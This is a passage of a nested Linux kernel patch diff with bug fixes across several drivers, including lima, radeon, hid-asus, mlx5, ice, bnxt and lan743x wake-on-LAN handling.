++	pipe->task_mask_irq(pipe);
++
+ 	if (!pipe->error)
+ 		DRM_ERROR("lima job timeout\n");
+ 
+diff --git a/drivers/gpu/drm/lima/lima_sched.h b/drivers/gpu/drm/lima/lima_sched.h
+index 6a11764d87b38..edf205be43699 100644
+--- a/drivers/gpu/drm/lima/lima_sched.h
++++ b/drivers/gpu/drm/lima/lima_sched.h
+@@ -80,6 +80,7 @@ struct lima_sched_pipe {
+ 	void (*task_error)(struct lima_sched_pipe *pipe);
+ 	void (*task_mmu_error)(struct lima_sched_pipe *pipe);
+ 	int (*task_recover)(struct lima_sched_pipe *pipe);
++	void (*task_mask_irq)(struct lima_sched_pipe *pipe);
+ 
+ 	struct work_struct recover_work;
+ };
+diff --git a/drivers/gpu/drm/radeon/sumo_dpm.c b/drivers/gpu/drm/radeon/sumo_dpm.c
+index d49c145db4370..f7f1ddc6cdd81 100644
+--- a/drivers/gpu/drm/radeon/sumo_dpm.c
++++ b/drivers/gpu/drm/radeon/sumo_dpm.c
+@@ -1621,6 +1621,8 @@ void sumo_construct_vid_mapping_table(struct radeon_device *rdev,
+ 
+ 	for (i = 0; i < SUMO_MAX_HARDWARE_POWERLEVELS; i++) {
+ 		if (table[i].ulSupportedSCLK != 0) {
++			if (table[i].usVoltageIndex >= SUMO_MAX_NUMBER_VOLTAGES)
++				continue;
+ 			vid_mapping_table->entries[table[i].usVoltageIndex].vid_7bit =
+ 				table[i].usVoltageID;
+ 			vid_mapping_table->entries[table[i].usVoltageIndex].vid_2bit =
+diff --git a/drivers/hid/hid-asus.c b/drivers/hid/hid-asus.c
+index 220d6b2af4d3f..1015fc0b40cb1 100644
+--- a/drivers/hid/hid-asus.c
++++ b/drivers/hid/hid-asus.c
+@@ -334,36 +334,20 @@ static int asus_raw_event(struct hid_device *hdev,
+ 	if (drvdata->quirks & QUIRK_MEDION_E1239T)
+ 		return asus_e1239t_event(drvdata, data, size);
+ 
+-	if (drvdata->quirks & QUIRK_USE_KBD_BACKLIGHT) {
++	/*
++	 * Skip these report ID, the device emits a continuous stream associated
++	 * with the AURA mode it is in which looks like an 'echo'.
++	 */
++	if (report->id == FEATURE_KBD_LED_REPORT_ID1 || report->id == FEATURE_KBD_LED_REPORT_ID2)
++		return -1;
++	if (drvdata->quirks & QUIRK_ROG_NKEY_KEYBOARD) {
+ 		/*
+-		 * Skip these report ID, the device emits a continuous stream associated
+-		 * with the AURA mode it is in which looks like an 'echo'.
++		 * G713 and G733 send these codes on some keypresses, depending on
++		 * the key pressed it can trigger a shutdown event if not caught.
+ 		*/
+-		if (report->id == FEATURE_KBD_LED_REPORT_ID1 ||
+-				report->id == FEATURE_KBD_LED_REPORT_ID2) {
++		if (data[0] == 0x02 && data[1] == 0x30) {
+ 			return -1;
+-		/* Additional report filtering */
+-		} else if (report->id == FEATURE_KBD_REPORT_ID) {
+-			/*
+-			 * G14 and G15 send these codes on some keypresses with no
+-			 * discernable reason for doing so. We'll filter them out to avoid
+-			 * unmapped warning messages later.
+-			*/
+-			if (data[1] == 0xea || data[1] == 0xec || data[1] == 0x02 ||
+-					data[1] == 0x8a || data[1] == 0x9e) {
+-				return -1;
+-			}
+-		}
+-		if (drvdata->quirks & QUIRK_ROG_NKEY_KEYBOARD) {
+-			/*
+-			 * G713 and G733 send these codes on some keypresses, depending on
+-			 * the key pressed it can trigger a shutdown event if not caught.
+-			*/
+-			if(data[0] == 0x02 && data[1] == 0x30) {
+-				return -1;
+-			}
+ 		}
+-
+ 	}
+ 
+ 	if (drvdata->quirks & QUIRK_ROG_CLAYMORE_II_KEYBOARD) {
+@@ -1262,6 +1246,19 @@ static __u8 *asus_report_fixup(struct hid_device *hdev, __u8 *rdesc,
+ 		rdesc[205] = 0x01;
+ 	}
+ 
++	/* match many more n-key devices */
++	if (drvdata->quirks & QUIRK_ROG_NKEY_KEYBOARD && *rsize > 15) {
++		for (int i = 0; i < *rsize - 15; i++) {
++			/* offset to the count from 0x5a report part always 14 */
++			if (rdesc[i] == 0x85 && rdesc[i + 1] == 0x5a &&
++			    rdesc[i + 14] == 0x95 && rdesc[i + 15] == 0x05) {
++				hid_info(hdev, "Fixing up Asus N-Key report descriptor\n");
++				rdesc[i + 15] = 0x01;
++				break;
++			}
++		}
++	}
++
+ 	return rdesc;
+ }
+ 
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 405d88b08908d..97745a1f9c6f1 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -802,6 +802,7 @@
+ #define USB_DEVICE_ID_LOGITECH_AUDIOHUB 0x0a0e
+ #define USB_DEVICE_ID_LOGITECH_T651	0xb00c
+ #define USB_DEVICE_ID_LOGITECH_DINOVO_EDGE_KBD	0xb309
++#define USB_DEVICE_ID_LOGITECH_CASA_TOUCHPAD	0xbb00
+ #define USB_DEVICE_ID_LOGITECH_C007	0xc007
+ #define USB_DEVICE_ID_LOGITECH_C077	0xc077
+ #define USB_DEVICE_ID_LOGITECH_RECEIVER	0xc101
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index 3816fd06bc953..17efe6e2a1a44 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -2084,6 +2084,12 @@ static const struct hid_device_id mt_devices[] = {
+ 			   USB_VENDOR_ID_LENOVO,
+ 			   USB_DEVICE_ID_LENOVO_X12_TAB) },
+ 
++	/* Logitech devices */
++	{ .driver_data = MT_CLS_NSMU,
++		HID_DEVICE(BUS_BLUETOOTH, HID_GROUP_MULTITOUCH_WIN_8,
++			USB_VENDOR_ID_LOGITECH,
++			USB_DEVICE_ID_LOGITECH_CASA_TOUCHPAD) },
++
+ 	/* MosArt panels */
+ 	{ .driver_data = MT_CLS_CONFIDENCE_MINUS_ONE,
+ 		MT_USB_DEVICE(USB_VENDOR_ID_ASUS,
+diff --git a/drivers/i2c/busses/i2c-ocores.c b/drivers/i2c/busses/i2c-ocores.c
+index 2e575856c5cd5..a2977ef5d1d41 100644
+--- a/drivers/i2c/busses/i2c-ocores.c
++++ b/drivers/i2c/busses/i2c-ocores.c
+@@ -442,8 +442,8 @@ static int ocores_init(struct device *dev, struct ocores_i2c *i2c)
+ 	oc_setreg(i2c, OCI2C_PREHIGH, prescale >> 8);
+ 
+ 	/* Init the device */
+-	oc_setreg(i2c, OCI2C_CMD, OCI2C_CMD_IACK);
+ 	oc_setreg(i2c, OCI2C_CONTROL, ctrl | OCI2C_CTRL_EN);
++	oc_setreg(i2c, OCI2C_CMD, OCI2C_CMD_IACK);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/infiniband/hw/mlx5/srq.c b/drivers/infiniband/hw/mlx5/srq.c
+index 09b365a98bbf3..731e6721a82bc 100644
+--- a/drivers/infiniband/hw/mlx5/srq.c
++++ b/drivers/infiniband/hw/mlx5/srq.c
+@@ -199,17 +199,20 @@ int mlx5_ib_create_srq(struct ib_srq *ib_srq,
+ 	int err;
+ 	struct mlx5_srq_attr in = {};
+ 	__u32 max_srq_wqes = 1 << MLX5_CAP_GEN(dev->mdev, log_max_srq_sz);
++	__u32 max_sge_sz =  MLX5_CAP_GEN(dev->mdev, max_wqe_sz_rq) /
++			    sizeof(struct mlx5_wqe_data_seg);
+ 
+ 	if (init_attr->srq_type != IB_SRQT_BASIC &&
+ 	    init_attr->srq_type != IB_SRQT_XRC &&
+ 	    init_attr->srq_type != IB_SRQT_TM)
+ 		return -EOPNOTSUPP;
+ 
+-	/* Sanity check SRQ size before proceeding */
+-	if (init_attr->attr.max_wr >= max_srq_wqes) {
+-		mlx5_ib_dbg(dev, "max_wr %d, cap %d\n",
+-			    init_attr->attr.max_wr,
+-			    max_srq_wqes);
++	/* Sanity check SRQ and sge size before proceeding */
++	if (init_attr->attr.max_wr >= max_srq_wqes ||
++	    init_attr->attr.max_sge > max_sge_sz) {
++		mlx5_ib_dbg(dev, "max_wr %d,wr_cap %d,max_sge %d, sge_cap:%d\n",
++			    init_attr->attr.max_wr, max_srq_wqes,
++			    init_attr->attr.max_sge, max_sge_sz);
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+index 82f100e591b5a..45b43f729f895 100644
+--- a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
++++ b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+@@ -3199,7 +3199,7 @@ static void arm_smmu_setup_msis(struct arm_smmu_device *smmu)
+ 	smmu->priq.q.irq = msi_get_virq(dev, PRIQ_MSI_INDEX);
+ 
+ 	/* Add callback to free MSIs on teardown */
+-	devm_add_action(dev, arm_smmu_free_msis, dev);
++	devm_add_action_or_reset(dev, arm_smmu_free_msis, dev);
+ }
+ 
+ static void arm_smmu_setup_unique_irqs(struct arm_smmu_device *smmu)
+diff --git a/drivers/net/dsa/realtek/rtl8366rb.c b/drivers/net/dsa/realtek/rtl8366rb.c
+index 25f88022b9e44..0ea5491781001 100644
+--- a/drivers/net/dsa/realtek/rtl8366rb.c
++++ b/drivers/net/dsa/realtek/rtl8366rb.c
+@@ -186,7 +186,12 @@
+ #define RTL8366RB_LED_BLINKRATE_222MS		0x0004
+ #define RTL8366RB_LED_BLINKRATE_446MS		0x0005
+ 
++/* LED trigger event for each group */
+ #define RTL8366RB_LED_CTRL_REG			0x0431
++#define RTL8366RB_LED_CTRL_OFFSET(led_group)	\
++	(4 * (led_group))
++#define RTL8366RB_LED_CTRL_MASK(led_group)	\
++	(0xf << RTL8366RB_LED_CTRL_OFFSET(led_group))
+ #define RTL8366RB_LED_OFF			0x0
+ #define RTL8366RB_LED_DUP_COL			0x1
+ #define RTL8366RB_LED_LINK_ACT			0x2
+@@ -203,6 +208,11 @@
+ #define RTL8366RB_LED_LINK_TX			0xd
+ #define RTL8366RB_LED_MASTER			0xe
+ #define RTL8366RB_LED_FORCE			0xf
++
++/* The RTL8366RB_LED_X_X registers are used to manually set the LED state only
++ * when the corresponding LED group in RTL8366RB_LED_CTRL_REG is
++ * RTL8366RB_LED_FORCE. Otherwise, it is ignored.
++ */
+ #define RTL8366RB_LED_0_1_CTRL_REG		0x0432
+ #define RTL8366RB_LED_1_OFFSET			6
+ #define RTL8366RB_LED_2_3_CTRL_REG		0x0433
+@@ -998,28 +1008,20 @@ static int rtl8366rb_setup(struct dsa_switch *ds)
+ 	 */
+ 	if (priv->leds_disabled) {
+ 		/* Turn everything off */
+-		regmap_update_bits(priv->map,
+-				   RTL8366RB_LED_0_1_CTRL_REG,
+-				   0x0FFF, 0);
+-		regmap_update_bits(priv->map,
+-				   RTL8366RB_LED_2_3_CTRL_REG,
+-				   0x0FFF, 0);
+ 		regmap_update_bits(priv->map,
+ 				   RTL8366RB_INTERRUPT_CONTROL_REG,
+ 				   RTL8366RB_P4_RGMII_LED,
+ 				   0);
+-		val = RTL8366RB_LED_OFF;
+-	} else {
+-		/* TODO: make this configurable per LED */
+-		val = RTL8366RB_LED_FORCE;
+-	}
+-	for (i = 0; i < 4; i++) {
+-		ret = regmap_update_bits(priv->map,
+-					 RTL8366RB_LED_CTRL_REG,
+-					 0xf << (i * 4),
+-					 val << (i * 4));
+-		if (ret)
+-			return ret;
++
++		for (i = 0; i < RTL8366RB_NUM_LEDGROUPS; i++) {
++			val = RTL8366RB_LED_OFF << RTL8366RB_LED_CTRL_OFFSET(i);
++			ret = regmap_update_bits(priv->map,
++						 RTL8366RB_LED_CTRL_REG,
++						 RTL8366RB_LED_CTRL_MASK(i),
++						 val);
++			if (ret)
++				return ret;
++		}
+ 	}
+ 
+ 	ret = rtl8366_reset_vlan(priv);
+@@ -1108,52 +1110,6 @@ rtl8366rb_mac_link_down(struct dsa_switch *ds, int port, unsigned int mode,
+ 	}
+ }
+ 
+-static void rb8366rb_set_port_led(struct realtek_priv *priv,
+-				  int port, bool enable)
+-{
+-	u16 val = enable ? 0x3f : 0;
+-	int ret;
+-
+-	if (priv->leds_disabled)
+-		return;
+-
+-	switch (port) {
+-	case 0:
+-		ret = regmap_update_bits(priv->map,
+-					 RTL8366RB_LED_0_1_CTRL_REG,
+-					 0x3F, val);
+-		break;
+-	case 1:
+-		ret = regmap_update_bits(priv->map,
+-					 RTL8366RB_LED_0_1_CTRL_REG,
+-					 0x3F << RTL8366RB_LED_1_OFFSET,
+-					 val << RTL8366RB_LED_1_OFFSET);
+-		break;
+-	case 2:
+-		ret = regmap_update_bits(priv->map,
+-					 RTL8366RB_LED_2_3_CTRL_REG,
+-					 0x3F, val);
+-		break;
+-	case 3:
+-		ret = regmap_update_bits(priv->map,
+-					 RTL8366RB_LED_2_3_CTRL_REG,
+-					 0x3F << RTL8366RB_LED_3_OFFSET,
+-					 val << RTL8366RB_LED_3_OFFSET);
+-		break;
+-	case 4:
+-		ret = regmap_update_bits(priv->map,
+-					 RTL8366RB_INTERRUPT_CONTROL_REG,
+-					 RTL8366RB_P4_RGMII_LED,
+-					 enable ? RTL8366RB_P4_RGMII_LED : 0);
+-		break;
+-	default:
+-		dev_err(priv->dev, "no LED for port %d\n", port);
+-		return;
+-	}
+-	if (ret)
+-		dev_err(priv->dev, "error updating LED on port %d\n", port);
+-}
+-
+ static int
+ rtl8366rb_port_enable(struct dsa_switch *ds, int port,
+ 		      struct phy_device *phy)
+@@ -1167,7 +1123,6 @@ rtl8366rb_port_enable(struct dsa_switch *ds, int port,
+ 	if (ret)
+ 		return ret;
+ 
+-	rb8366rb_set_port_led(priv, port, true);
+ 	return 0;
+ }
+ 
+@@ -1182,8 +1137,6 @@ rtl8366rb_port_disable(struct dsa_switch *ds, int port)
+ 				 BIT(port));
+ 	if (ret)
+ 		return;
+-
+-	rb8366rb_set_port_led(priv, port, false);
+ }
+ 
+ static int
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 77ea19bcdc6fe..20e2fae64e67f 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -617,9 +617,6 @@ static netdev_tx_t bnxt_start_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	return NETDEV_TX_OK;
+ 
+ tx_dma_error:
+-	if (BNXT_TX_PTP_IS_SET(lflags))
+-		atomic_inc(&bp->ptp_cfg->tx_avail);
+-
+ 	last_frag = i;
+ 
+ 	/* start back at beginning and unmap skb */
+@@ -641,6 +638,8 @@ static netdev_tx_t bnxt_start_xmit(struct sk_buff *skb, struct net_device *dev)
+ tx_free:
+ 	dev_kfree_skb_any(skb);
+ tx_kick_pending:
++	if (BNXT_TX_PTP_IS_SET(lflags))
++		atomic_inc(&bp->ptp_cfg->tx_avail);
+ 	if (txr->kick_pending)
+ 		bnxt_txr_db_kick(bp, txr, txr->tx_prod);
+ 	txr->tx_buf_ring[txr->tx_prod].skb = NULL;
+diff --git a/drivers/net/ethernet/intel/ice/ice.h b/drivers/net/ethernet/intel/ice/ice.h
+index 6d75e5638f665..1fe9cccf18d2f 100644
+--- a/drivers/net/ethernet/intel/ice/ice.h
++++ b/drivers/net/ethernet/intel/ice/ice.h
+@@ -901,6 +901,7 @@ void ice_print_link_msg(struct ice_vsi *vsi, bool isup);
+ int ice_plug_aux_dev(struct ice_pf *pf);
+ void ice_unplug_aux_dev(struct ice_pf *pf);
+ int ice_init_rdma(struct ice_pf *pf);
++void ice_deinit_rdma(struct ice_pf *pf);
+ const char *ice_aq_str(enum ice_aq_err aq_err);
+ bool ice_is_wol_supported(struct ice_hw *hw);
+ void ice_fdir_del_all_fltrs(struct ice_vsi *vsi);
+diff --git a/drivers/net/ethernet/intel/ice/ice_idc.c b/drivers/net/ethernet/intel/ice/ice_idc.c
+index 895c32bcc8b5e..579d2a433ea12 100644
+--- a/drivers/net/ethernet/intel/ice/ice_idc.c
++++ b/drivers/net/ethernet/intel/ice/ice_idc.c
+@@ -6,6 +6,8 @@
+ #include "ice_lib.h"
+ #include "ice_dcb_lib.h"
+ 
++static DEFINE_IDA(ice_aux_ida);
++
+ /**
+  * ice_get_auxiliary_drv - retrieve iidc_auxiliary_drv struct
+  * @pf: pointer to PF struct
+@@ -245,6 +247,17 @@ static int ice_reserve_rdma_qvector(struct ice_pf *pf)
+ 	return 0;
+ }
+ 
++/**
++ * ice_free_rdma_qvector - free vector resources reserved for RDMA driver
++ * @pf: board private structure to initialize
++ */
++static void ice_free_rdma_qvector(struct ice_pf *pf)
++{
++	pf->num_avail_sw_msix -= pf->num_rdma_msix;
++	ice_free_res(pf->irq_tracker, pf->rdma_base_vector,
++		     ICE_RES_RDMA_VEC_ID);
++}
++
+ /**
+  * ice_adev_release - function to be mapped to AUX dev's release op
+  * @dev: pointer to device to free
+@@ -331,12 +344,47 @@ int ice_init_rdma(struct ice_pf *pf)
+ 	struct device *dev = &pf->pdev->dev;
+ 	int ret;
+ 
++	if (!ice_is_rdma_ena(pf)) {
++		dev_warn(dev, "RDMA is not supported on this device\n");
++		return 0;
++	}
++
++	pf->aux_idx = ida_alloc(&ice_aux_ida, GFP_KERNEL);
++	if (pf->aux_idx < 0) {
++		dev_err(dev, "Failed to allocate device ID for AUX driver\n");
++		return -ENOMEM;
++	}
++
+ 	/* Reserve vector resources */
+ 	ret = ice_reserve_rdma_qvector(pf);
+ 	if (ret < 0) {
+ 		dev_err(dev, "failed to reserve vectors for RDMA\n");
+-		return ret;
++		goto err_reserve_rdma_qvector;
+ 	}
+ 	pf->rdma_mode |= IIDC_RDMA_PROTOCOL_ROCEV2;
+-	return ice_plug_aux_dev(pf);
++	ret = ice_plug_aux_dev(pf);
++	if (ret)
++		goto err_plug_aux_dev;
++	return 0;
++
++err_plug_aux_dev:
++	ice_free_rdma_qvector(pf);
++err_reserve_rdma_qvector:
++	pf->adev = NULL;
++	ida_free(&ice_aux_ida, pf->aux_idx);
++	return ret;
++}
++
++/**
++ * ice_deinit_rdma - deinitialize RDMA on PF
++ * @pf: ptr to ice_pf
++ */
++void ice_deinit_rdma(struct ice_pf *pf)
++{
++	if (!ice_is_rdma_ena(pf))
++		return;
++
++	ice_unplug_aux_dev(pf);
++	ice_free_rdma_qvector(pf);
++	ida_free(&ice_aux_ida, pf->aux_idx);
+ }
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 3117f65253b37..6e55861dd86fe 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -45,7 +45,6 @@ MODULE_PARM_DESC(debug, "netif level (0=none,...,16=all), hw debug_mask (0x8XXXX
+ MODULE_PARM_DESC(debug, "netif level (0=none,...,16=all)");
+ #endif /* !CONFIG_DYNAMIC_DEBUG */
+ 
+-static DEFINE_IDA(ice_aux_ida);
+ DEFINE_STATIC_KEY_FALSE(ice_xdp_locking_key);
+ EXPORT_SYMBOL(ice_xdp_locking_key);
+ 
+@@ -4971,30 +4970,16 @@ ice_probe(struct pci_dev *pdev, const struct pci_device_id __always_unused *ent)
+ 
+ 	/* ready to go, so clear down state bit */
+ 	clear_bit(ICE_DOWN, pf->state);
+-	if (ice_is_rdma_ena(pf)) {
+-		pf->aux_idx = ida_alloc(&ice_aux_ida, GFP_KERNEL);
+-		if (pf->aux_idx < 0) {
+-			dev_err(dev, "Failed to allocate device ID for AUX driver\n");
+-			err = -ENOMEM;
+-			goto err_devlink_reg_param;
+-		}
+-
+-		err = ice_init_rdma(pf);
+-		if (err) {
+-			dev_err(dev, "Failed to initialize RDMA: %d\n", err);
+-			err = -EIO;
+-			goto err_init_aux_unroll;
+-		}
+-	} else {
+-		dev_warn(dev, "RDMA is not supported on this device\n");
++	err = ice_init_rdma(pf);
++	if (err) {
++		dev_err(dev, "Failed to initialize RDMA: %d\n", err);
++		err = -EIO;
++		goto err_devlink_reg_param;
+ 	}
+ 
+ 	ice_devlink_register(pf);
+ 	return 0;
+ 
+-err_init_aux_unroll:
+-	pf->adev = NULL;
+-	ida_free(&ice_aux_ida, pf->aux_idx);
+ err_devlink_reg_param:
+ 	ice_devlink_unregister_params(pf);
+ err_netdev_reg:
+@@ -5106,9 +5091,7 @@ static void ice_remove(struct pci_dev *pdev)
+ 	ice_service_task_stop(pf);
+ 
+ 	ice_aq_cancel_waiting_tasks(pf);
+-	ice_unplug_aux_dev(pf);
+-	if (pf->aux_idx >= 0)
+-		ida_free(&ice_aux_ida, pf->aux_idx);
++	ice_deinit_rdma(pf);
+ 	ice_devlink_unregister_params(pf);
+ 	set_bit(ICE_DOWN, pf->state);
+ 
+@@ -5268,7 +5251,7 @@ static int __maybe_unused ice_suspend(struct device *dev)
+ 	 */
+ 	disabled = ice_service_task_stop(pf);
+ 
+-	ice_unplug_aux_dev(pf);
++	ice_deinit_rdma(pf);
+ 
+ 	/* Already suspended?, then there is nothing to do */
+ 	if (test_and_set_bit(ICE_SUSPENDED, pf->state)) {
+@@ -5348,6 +5331,11 @@ static int __maybe_unused ice_resume(struct device *dev)
+ 	if (ret)
+ 		dev_err(dev, "Cannot restore interrupt scheme: %d\n", ret);
+ 
++	ret = ice_init_rdma(pf);
++	if (ret)
++		dev_err(dev, "Reinitialize RDMA during resume failed: %d\n",
++			ret);
++
+ 	clear_bit(ICE_DOWN, pf->state);
+ 	/* Now perform PF reset and rebuild */
+ 	reset_type = ICE_RESET_PFR;
+diff --git a/drivers/net/ethernet/intel/ice/ice_switch.c b/drivers/net/ethernet/intel/ice/ice_switch.c
+index 5ea6365872571..735f995a3a687 100644
+--- a/drivers/net/ethernet/intel/ice/ice_switch.c
++++ b/drivers/net/ethernet/intel/ice/ice_switch.c
+@@ -1838,7 +1838,8 @@ ice_aq_alloc_free_vsi_list(struct ice_hw *hw, u16 *vsi_list_id,
+ 	    lkup_type == ICE_SW_LKUP_ETHERTYPE_MAC ||
+ 	    lkup_type == ICE_SW_LKUP_PROMISC ||
+ 	    lkup_type == ICE_SW_LKUP_PROMISC_VLAN ||
+-	    lkup_type == ICE_SW_LKUP_DFLT) {
++	    lkup_type == ICE_SW_LKUP_DFLT ||
++	    lkup_type == ICE_SW_LKUP_LAST) {
+ 		sw_buf->res_type = cpu_to_le16(ICE_AQC_RES_TYPE_VSI_LIST_REP);
+ 	} else if (lkup_type == ICE_SW_LKUP_VLAN) {
+ 		sw_buf->res_type =
+@@ -2764,7 +2765,8 @@ ice_update_vsi_list_rule(struct ice_hw *hw, u16 *vsi_handle_arr, u16 num_vsi,
+ 	    lkup_type == ICE_SW_LKUP_ETHERTYPE_MAC ||
+ 	    lkup_type == ICE_SW_LKUP_PROMISC ||
+ 	    lkup_type == ICE_SW_LKUP_PROMISC_VLAN ||
+-	    lkup_type == ICE_SW_LKUP_DFLT)
++	    lkup_type == ICE_SW_LKUP_DFLT ||
++	    lkup_type == ICE_SW_LKUP_LAST)
+ 		rule_type = remove ? ICE_AQC_SW_RULES_T_VSI_LIST_CLEAR :
+ 			ICE_AQC_SW_RULES_T_VSI_LIST_SET;
+ 	else if (lkup_type == ICE_SW_LKUP_VLAN)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+index aee392a15b23c..e579183e52392 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+@@ -1152,8 +1152,11 @@ bool otx2_sq_append_skb(struct net_device *netdev, struct otx2_snd_queue *sq,
+ 
+ 	if (skb_shinfo(skb)->gso_size && !is_hw_tso_supported(pfvf, skb)) {
+ 		/* Insert vlan tag before giving pkt to tso */
+-		if (skb_vlan_tag_present(skb))
++		if (skb_vlan_tag_present(skb)) {
+ 			skb = __vlan_hwaccel_push_inside(skb);
++			if (!skb)
++				return true;
++		}
+ 		otx2_sq_append_tso(pfvf, sq, skb, qidx);
+ 		return true;
+ 	}
+diff --git a/drivers/net/ethernet/microchip/lan743x_ethtool.c b/drivers/net/ethernet/microchip/lan743x_ethtool.c
+index c739d60ee17d5..e47a579410fbb 100644
+--- a/drivers/net/ethernet/microchip/lan743x_ethtool.c
++++ b/drivers/net/ethernet/microchip/lan743x_ethtool.c
+@@ -1146,8 +1146,12 @@ static void lan743x_ethtool_get_wol(struct net_device *netdev,
+ 	if (netdev->phydev)
+ 		phy_ethtool_get_wol(netdev->phydev, wol);
+ 
+-	wol->supported |= WAKE_BCAST | WAKE_UCAST | WAKE_MCAST |
+-		WAKE_MAGIC | WAKE_PHY | WAKE_ARP;
++	if (wol->supported != adapter->phy_wol_supported)
++		netif_warn(adapter, drv, adapter->netdev,
++			   "PHY changed its supported WOL! old=%x, new=%x\n",
++			   adapter->phy_wol_supported, wol->supported);
++
++	wol->supported |= MAC_SUPPORTED_WAKES;
+ 
+ 	if (adapter->is_pci11x1x)
+ 		wol->supported |= WAKE_MAGICSECURE;
+@@ -1162,7 +1166,39 @@ static int lan743x_ethtool_set_wol(struct net_device *netdev,
+ {
+ 	struct lan743x_adapter *adapter = netdev_priv(netdev);
+ 
++	/* WAKE_MAGICSEGURE is a modifier of and only valid together with
++	 * WAKE_MAGIC
++	 */
++	if ((wol->wolopts & WAKE_MAGICSECURE) && !(wol->wolopts & WAKE_MAGIC))
++		return -EINVAL;
++
++	if (netdev->phydev) {
++		struct ethtool_wolinfo phy_wol;
++		int ret;
++
++		phy_wol.wolopts = wol->wolopts & adapter->phy_wol_supported;
++
++		/* If WAKE_MAGICSECURE was requested, filter out WAKE_MAGIC
++		 * for PHYs that do not support WAKE_MAGICSECURE
++		 */
++		if (wol->wolopts & WAKE_MAGICSECURE &&
++		    !(adapter->phy_wol_supported & WAKE_MAGICSECURE))
++			phy_wol.wolopts &= ~WAKE_MAGIC;
++
++		ret = phy_ethtool_set_wol(netdev->phydev, &phy_wol);
++		if (ret && (ret != -EOPNOTSUPP))
++			return ret;
++
++		if (ret == -EOPNOTSUPP)
++			adapter->phy_wolopts = 0;
++		else
++			adapter->phy_wolopts = phy_wol.wolopts;
++	} else {
++		adapter->phy_wolopts = 0;
++	}
++
+ 	adapter->wolopts = 0;
++	wol->wolopts &= ~adapter->phy_wolopts;
+ 	if (wol->wolopts & WAKE_UCAST)
+ 		adapter->wolopts |= WAKE_UCAST;
+ 	if (wol->wolopts & WAKE_MCAST)
+@@ -1183,10 +1219,10 @@ static int lan743x_ethtool_set_wol(struct net_device *netdev,
+ 		memset(adapter->sopass, 0, sizeof(u8) * SOPASS_MAX);
+ 	}
+ 
++	wol->wolopts = adapter->wolopts | adapter->phy_wolopts;
+ 	device_set_wakeup_enable(&adapter->pdev->dev, (bool)wol->wolopts);
+ 
+-	return netdev->phydev ? phy_ethtool_set_wol(netdev->phydev, wol)
+-			: -ENETDOWN;
++	return 0;
+ }
+ #endif /* CONFIG_PM */
+ 
+diff --git a/drivers/net/ethernet/microchip/lan743x_main.c b/drivers/net/ethernet/microchip/lan743x_main.c
+index d5123e8c4a9f4..0b2eaed110720 100644
+--- a/drivers/net/ethernet/microchip/lan743x_main.c
++++ b/drivers/net/ethernet/microchip/lan743x_main.c
+@@ -3056,6 +3056,17 @@ static int lan743x_netdev_open(struct net_device *netdev)
+ 		if (ret)
+ 			goto close_tx;
+ 	}
++
++#ifdef CONFIG_PM
++	if (adapter->netdev->phydev) {
++		struct ethtool_wolinfo wol = { .cmd = ETHTOOL_GWOL };
++
++		phy_ethtool_get_wol(netdev->phydev, &wol);
++		adapter->phy_wol_supported = wol.supported;
++		adapter->phy_wolopts = wol.wolopts;
++	}
++#endif
++
+ 	return 0;
+ 
+ close_tx:
+@@ -3513,7 +3524,7 @@ static void lan743x_pm_set_wol(struct lan743x_adapter *adapter)
+ 
+ 	/* clear wake settings */
+ 	pmtctl = lan743x_csr_read(adapter, PMT_CTL);
+-	pmtctl |= PMT_CTL_WUPS_MASK_;
++	pmtctl |= PMT_CTL_WUPS_MASK_ | PMT_CTL_RES_CLR_WKP_MASK_;
+ 	pmtctl &= ~(PMT_CTL_GPIO_WAKEUP_EN_ | PMT_CTL_EEE_WAKEUP_EN_ |
+ 		PMT_CTL_WOL_EN_ | PMT_CTL_MAC_D3_RX_CLK_OVR_ |
+ 		PMT_CTL_RX_FCT_RFE_D3_CLK_OVR_ | PMT_CTL_ETH_PHY_WAKE_EN_);
+@@ -3525,10 +3536,9 @@ static void lan743x_pm_set_wol(struct lan743x_adapter *adapter)
+ 
+ 	pmtctl |= PMT_CTL_ETH_PHY_D3_COLD_OVR_ | PMT_CTL_ETH_PHY_D3_OVR_;
+ 
+-	if (adapter->wolopts & WAKE_PHY) {
+-		pmtctl |= PMT_CTL_ETH_PHY_EDPD_PLL_CTL_;
++	if (adapter->phy_wolopts)
+ 		pmtctl |= PMT_CTL_ETH_PHY_WAKE_EN_;
+-	}
++
+ 	if (adapter->wolopts & WAKE_MAGIC) {
+ 		wucsr |= MAC_WUCSR_MPEN_;
+ 		macrx |= MAC_RX_RXEN_;
+@@ -3624,7 +3634,7 @@ static int lan743x_pm_suspend(struct device *dev)
+ 	lan743x_csr_write(adapter, MAC_WUCSR2, 0);
+ 	lan743x_csr_write(adapter, MAC_WK_SRC, 0xFFFFFFFF);
+ 
+-	if (adapter->wolopts)
++	if (adapter->wolopts || adapter->phy_wolopts)
+ 		lan743x_pm_set_wol(adapter);
+ 
+ 	if (adapter->is_pci11x1x) {
+@@ -3648,6 +3658,7 @@ static int lan743x_pm_resume(struct device *dev)
+ 	struct pci_dev *pdev = to_pci_dev(dev);
